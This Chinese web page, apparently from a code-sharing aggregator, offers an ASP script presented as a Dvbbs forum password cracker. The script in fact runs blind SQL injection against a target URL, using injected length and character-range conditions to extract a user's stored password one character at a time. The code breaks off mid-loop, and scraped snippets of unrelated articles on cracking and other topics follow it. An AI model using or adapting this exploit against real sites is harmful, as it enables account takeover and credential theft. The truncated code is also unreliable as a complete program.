动网论坛password暴力破解程序代码

<%

response.buffer=false

‘为防止程序陷入死循环,初始化一些最大重试值

Dim MaxPassLen,MaxPassAsc

MaxPassLen=20 ‘password最大长度

MaxPassAsc=20

‘==== 字符转换

Function bytes2BSTR(vIn)

strReturn = ""

For j = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn,j,1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn,j+1,1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

j = j + 1

End If

Next

bytes2BSTR = strReturn

End Function

‘ 以下是取网页内容 ==========

Function GetUrl(Url)

set oSend=createobject("Microsoft.XMLHTTP")

SourceCode = oSend.open ("GET",url,false)

oSend.send()

SourceCode = bytes2BSTR(oSend.responseBody)

GetUrl = SourceCode

End Function

‘以下是推断返回页面效果

Function ChkPage(SourceCode,SucKey,ErrKey)

if Instr(SourceCode,SucKey) > 0 then

ChkPage=true ‘页面返回成功

exit function

end if

if Instr(SourceCode,ErrKey) > 0 then

ChkPage=false ‘页面出错

exit function

end if

ChkPage=false ‘keyword信息不正确或者是页面未连接

response.write("keyword信息不正确或者是页面未连接")

response.end

End Function

‘開始破解

‘Dim url,username,password,SucKey,

Dim PassLenUrl

Dim PassLen

Dim ChkPassLen

If request("begin")<>"" then

response.cookies("PassLen")=0

url=request("url")

username=request("username")

password=request("password")

SucKey=request("SucKey")

ErrKey=request("ErrKey")

response.write("第一步,破解password长度<BR>")

PassLen = 1

ChkPassLen = false

Do while not ChkPassLen

PassLenUrl = Url & username & "‘%20and%20len(" & password & ")=" & PassLen & "%20and%20‘1‘=‘1"

response.write("当前測试password位数为“" & PassLen & "”,请稍等......<BR>")

ChkPassLen = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey)

If ChkPassLen Then

response.write("成功!!!password位数已经測试出来了,開始測试详细位数<BR>")

exit do

Else

response.write("不行,继续下一位測试!<BR>")

End If

If PassLen > MaxPassLen then

response.write( "password位数未能測试出,请确认是否有此用户或又一次调整password长度范围")

response.end

exit do

End If

PassLen = PassLen + 1

Loop

response.write ("<FONT COLOR=red>已经測试出password长度为" & PassLen & ",開始測试详细password值</FONT><BR><BR>")

‘循环每一位

Dim Asc1,Asc2,Asc10,Asc20,Ascstr

‘Dim AscArr(PassLen)

Dim ChkPass,Asctemp1,Asctemp,count

Ascstr = ""

For i=1 to PassLen

ChkPass = false

Asc1 = 33

Asc2 = 126

response.write "開始破解第" & i & "位password<BR>"

‘用二分法取asc码范围

count=1

suc=false

Do while not suc

Asctemp1=Asctemp

if (Asc2-Asc1) mod 2 = 1 then

Asctemp=(Asc2-Asc1-1)/2

else

Asctemp=(Asc2-Asc1)/2

end if

response.write "划定password范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>"

PassLenUrl = Url & username & "‘%20and%20asc(mid(password,"&i&",1))>=" & int(Asc1) & "%20and%20asc(mid(password,"&i&",1))<=" & int(Asc2) & "%20and%20‘1‘=‘1"

response.write "划定password范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>"

ChkPass = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey)

if Asc1 = 33 and Asc2 = 126 and not ChkPass then

response.write "password不在所设定ASC码范围内"

%>

动网论坛password暴力破解程序代码

时间: 2024-10-06 12:05:42

动网论坛password暴力破解程序代码的相关文章

动网论坛密码暴力破解程序代码

我们通常这么写 using (SqlDataReader drm = sqlComm.ExecuteReader()) { drm.Read();//以下把数据库中读出的Image流在图片框中显示出来. MemoryStream ms = new MemoryStream((byte[])drm["Logo"]); Image img = Image.FromStream(ms); this.pictureBox1.Image = img; } 我的写数据 private void b

第三章web安全基础—IIS发布dvbbs(动网论坛)及SQL2005问题解决

DVBBS小科普(来源:https://baike.baidu.com/item/动网论坛/369961?fr=aladdin): 动网论坛(也称“Dvbbs”)作为目前国内最大的社区论坛软件服务提供商,依靠其强大的功能.非凡的访问速度和负载能力.友好方便的客户操作界面.优质的客户服务.国内领先的技术和强大而持续的产品研发并保持不断创新的能力,动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上. DVBBS依靠ASP环境简单易用的优势,以高效快速,功能强大著称,一直深受广

利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想

前些天Open入手了Teensy++ 2.0,所以在无聊的情况下研究了Teensy++ 2.0模拟EM410X,并且针对EM410X的门禁进行了一次暴力破解测试,以下就是相关代码以及内容. 什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, Low frequency)是指频带由30KHz到300KHz的无线电电波.一些无线电频率识别( RFID技

2-3 sshd服务---暴力破解应对策略

  sshd服务暴力破解步骤 sshd暴力破解方法 防止暴力破解调优 1. 变更默认端口 2. 变更root用户 3. 日志监控-->防止暴力破解(fail2ban应用) fail2ban详解 在初始化的服务器中,20种ssh服务调优方法! 技术来源于生活!!! =============================================== sshd服务暴力破解步骤 第一步:确认目标IP地址 第二步:确认目标端口--->根据目标开放端口,确定其操作系统 第三步:运行暴力破解程序

利用Teensy进行em410x卡模拟以及暴力破解em410x类门禁系统

什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, Low frequency)是指频带由30KHz到300KHz的无线电电波.一些无线电频率识别( RFID技术 )标签使用低频. 这些标签通常被称为 LFID’s或LowFID’s(低频率识别Low Frequency Identification). 然而LFID’s/LowFID’s所常用(非

【初学破解】暴力破解绕过程序认证

最近在学习的时候有缘认识到了破解 为了能够略懂~花了点时间在这个上面做了点简单的破解实验~~ 下面将会介绍在破解程序中非常简单的一种破解方法----暴力破解~~~ 正文: ①编写漏洞程序 首先用c语言写了一个小bug程序 代码如下: #include <stdio.h> #include <windows.h> int main(){ int s=0; scanf("%d",&s); if(s == 8){ printf("注册成功!"

内网暴力破解telnet密码进行登陆

这里只是一个思路,傻瓜式的方法偶尔也会比较实惠. 有时候,你在网吧,机房使用电脑时,就在内网.一般来说,内网的安全性较差,在那些3389端口大开,没有组策略限制的地儿,我们可以用以下方法来傻瓜式入侵内网的其他机子. 扫描内网网段内开启了3389的机子有哪些,这里我用了nmap,发现了一台主机192.168.72.141和143在线开了3389: 然后打开tscrack,进行暴力破解:当然,这里你需要自己选择密码文本的内容: 一般来说,软件生成比较方便: 3.默认模式为对Administrator

防止WordPress利用xmlrpc.php进行暴力破解以及DDoS

早在2012 年 12 月 17 日一些采用 PHP 的知名博客程序 WordPress被曝光存在严重的漏洞,该漏洞覆盖WordPress 全部已发布的版本(包括WordPress 3.8.1).该漏洞的 WordPress 扫描工具也在很多论坛和网站发布出来.工具可以利用 WordPress 漏洞来进行扫描,也可以发起DDoS 攻击.经过测试,漏洞影响存在 xmlrpc.php 文件的全部版本. 最近我也遇到了大规模的wordpress后台(wp-login.php)爆破,wordpress差

网络攻防研究第001篇:尝试暴力破解某高校研究生管理系统学生密码

前言 如果你是在校大学生,而且还对网络攻防比较感兴趣的话,相信你最开始尝试渗透的莫过于所在院校的学生管理系统.因为一般来说这样的系统往往比较薄弱,拿来练手那是再合适不过的了.作为本系列的第一篇文章,我将会利用暴力破解的方式,尝试对某高校的研究生管理系统的学生密码进行破解.由于这个管理系统的网站属于该高校的内网资源,外网是无法访问的,因此大家就不要尝试按照文中的内容来对文中出现的网址进行访问了.利用本文所论述的暴力破解思想,可以帮助大家更好地认识我们的网络,也有助于了解目标网站是否安全.那么在这里